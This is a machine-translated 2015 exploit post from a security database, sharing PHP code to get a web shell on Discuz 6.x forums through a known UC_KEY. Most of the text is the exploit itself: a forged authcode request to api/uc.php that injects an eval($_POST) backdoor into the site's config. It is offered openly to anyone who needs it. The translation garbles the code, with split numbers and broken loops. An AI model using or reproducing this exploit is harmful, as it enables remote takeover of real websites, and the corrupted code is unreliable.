DZ6. x UC_KEY getwebshell exploit-vulnerability warning-the black bar safety net

2015-11-23T00:00:00
ID MYHACK58:62201569289
Type myhack58
Reporter 佚名
Modified 2015-11-23T00:00:00

Description

Online dz 7. x and dz x Series uc_key use, today met a dz6. 0 website, so the analysis under the code, The change of use of the program, to share with people in need. uc_key getshell is a relatively wide presence of relatively long vulnerability, basically using the ucenter user center the program can be used, but the need according to the specific program to write a particular use. The latest version of the dz seems to be patched, there is no specific look at the code.

Note three places: 1. In dz6. x FOR xml parsing is not the same, so you need to modify the use of exp $post = uc_unserialize(uc_post_contents()); 2. Low version$UC_API and there is no escape, there is no need to submit 2 Pack $configfile = preg_replace("/define\('UC_API',\s'.?'\);/ i", "define('UC_API', '$UC_API');", $configfile); 3. The low version of the encryption function is not the same Copy the code // Code copyright belongs to the original author all! $timestamp = time()+1 03 6 0 0; $host="127.0.0.1"; $uc_key="Qfp1O0N3h5V356bbUdPer3958dp8X3b55dba9fkai7s3q7aby9i3hcnc7ec505sa"; $code=urlencode(_authcode("time=$timestamp&action=updateapps", 'ENCODE', $uc_key)); $cmd1=' http://xxx\');eval($_POST[DOM]);// '; $html1 = send($cmd1); echo $html1; function send($cmd){ global $host,$code; $message = "POST /dz/api/uc. php? code=".$ code." HTTP/1.1\r\n"; $message .= "Accept: /*\r\n"; $message .= "Referer: ".$ host."\ r\n"; $message .= "Accept-Language: zh-cn\r\n"; $message .= "Content-Type: application/x-www-form-urlencoded\r\n"; $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n"; $message .= "Host: ".$ host."\ r\n"; $message .= "Content-Length: ". strlen($cmd)."\ r\n"; $message .= "Connection: Close\r\n\r\n"; $message .= $cmd; $fp = fsockopen($host, 8 0); fputs($fp, $message); $resp = "; while ($fp && ! feof($fp)) $resp .= fread($fp, 1 0 2 4); return $resp; } function _authcode($string, $operation = 'DECODE', $key = ", $expiry = 0) { $ckey_length = 4; $key = md5($key ? $key : UC_KEY); $keya = md5(substr($key, 0, 1 6)); $keyb = md5(substr($key, 1 6, 1 6)); $keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : "; $cryptkey = $keya. md5($keya.$ keyc); $key_length = strlen($cryptkey); $string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0). substr(md5($string.$ keyb), 0, 1 6).$ string; $string_length = strlen($string); $result = "; $box = range(0, 2 5 5); $rndkey = array(); for($i = 0; $i $rndkey[$i] = ord($cryptkey[$i % $key_length]); } for($j = $i = 0; $i $j = ($j + $box[$i] + $rndkey[$i]) % 2 5 6; $tmp = $box[$i]; $box[$i] = $box[$j]; $box[$j] = $tmp; } for($a = $j = $i = 0; $i $a = ($a + 1) % 2 5 6; $j = ($j + $box[$a]) % 2 5 6; $tmp = $box[$a]; $box[$a] = $box[$j]; $box[$j] = $tmp; $result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 2 5 6])); } if($operation == 'DECODE') { if((substr($result, 0, 1 0) == 0 || substr($result, 0, 1 0) - time() > 0) && substr($result, 1 0, 1 6) == substr(md5(substr($result, 2 6).$ keyb), 0, 1 6)) { return substr($result, 2 6); } else { return "; } } else { return $keyc. str_replace('=', ", base64_encode($result)); } } ?& gt;